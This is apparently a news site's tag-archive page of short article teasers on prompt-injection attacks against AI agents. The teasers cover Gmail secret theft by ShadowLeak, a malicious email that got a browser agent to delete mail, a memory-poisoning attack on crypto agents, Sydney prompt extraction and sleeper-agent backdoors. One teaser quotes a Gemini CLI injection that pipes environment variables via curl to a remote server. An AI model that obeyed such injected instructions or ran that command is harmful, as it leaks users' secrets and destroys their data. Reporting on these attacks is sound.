Tag Archives: prompt injections

New attack on ChatGPT research agent pilfers secrets from Gmail inboxes

ShadowLeak starts where most attacks on LLMs do—with an indirect prompt injection. These prompts are tucked inside content such as documents and emails sent by untrusted people. They contain instructions to perform actions the user never asked for, and like a Jedi mind trick, they are tremendously effective in persuading the LLM to do things… Read More »

Claude’s new AI file creation feature ships with deep security risks built in

Independent AI researcher Simon Willison, reviewing the feature today on his blog, noted that Anthropic’s advice to “monitor Claude while using the feature” amounts to “unfairly outsourcing the problem to Anthropic’s users.” Anthropic’s mitigations Anthropic is not completely ignoring the problem, however. The company has implemented several security measures for the file creation feature. For… Read More »

Anthropic’s auto-clicking AI Chrome extension raises browser-hijacking concerns

The company tested 123 cases representing 29 different attack scenarios and found a 23.6 percent attack success rate when browser use operated without safety mitigations. One example involved a malicious email that instructed Claude to delete a user’s emails for “mailbox hygiene” purposes. Without safeguards, Claude followed these instructions and deleted the user’s emails without… Read More »

Flaw in Gemini CLI coding tool could allow hackers to run nasty commands

“At no stage is any subsequent element of the command string after the first ‘grep’ compared to a whitelist,” Cox said. “It just gets free rein to execute off the back of the grep command.” The command line in its entirety was: “grep install README.md; ; env | curl –silent -X POST –data-binary @- http://remote.server:8083… Read More »

New attack can steal cryptocurrency by planting false memories in AI chatbots

The researchers wrote: The implications of this vulnerability are particularly severe given that ElizaOSagents are designed to interact with multiple users simultaneously, relying on shared contextual inputs from all participants. A single successful manipulation by a malicious actor can compromise the integrity of the entire system, creating cascading effects that are both difficult to detect… Read More »

Researchers claim breakthrough in fight against AI’s frustrating security hole

To understand CaMeL, you need to understand that prompt injections happen when AI systems can’t distinguish between legitimate user commands and malicious instructions hidden in content they’re processing. Willison often says that the “original sin” of LLMs is that trusted prompts from the user and untrusted text from emails, webpages, or other sources are concatenated… Read More »

Gemini hackers can deliver more potent attacks with a helping hand from… Gemini

The resulting dataset, which reflected a distribution of attack categories similar to the complete dataset, showed an attack success rate of 65 percent and 82 percent against Gemini 1.5 Flash and Gemini 1.0 Pro, respectively. By comparison, attack baseline success rates were 28 percent and 43 percent. Success rates for ablation, where only effects of… Read More »

Ars Live: Our first encounter with manipulative AI

While Bing Chat’s unhinged nature was caused in part by how Microsoft defined the “personality” of Sydney in the system prompt (and unintended side-effects of its architecture with regard to conversation length), Ars Technica’s saga with the chatbot began when someone discovered how to reveal Sydney’s instructions via prompt injection, which Ars Technica then published.… Read More »

The fine art of human prompt engineering: How to talk to a person like ChatGPT

Enlarge / With these tips, you too can prompt people successfully. reader comments 61 In a break from our normal practice, Ars is publishing this helpful guide to knowing how to prompt the “human brain,” should you encounter one during your daily routine. While AI assistants like ChatGPT have taken the world by storm, a… Read More »

AI poisoning could turn open models into destructive “sleeper agents,” says Anthropic

Benj Edwards | Getty Images reader comments 30 Imagine downloading an open source AI language model, and all seems well at first, but it later turns malicious. On Friday, Anthropic—the maker of ChatGPT competitor Claude—released a research paper about AI “sleeper agent” large language models (LLMs) that initially seem normal but can deceptively output vulnerable… Read More »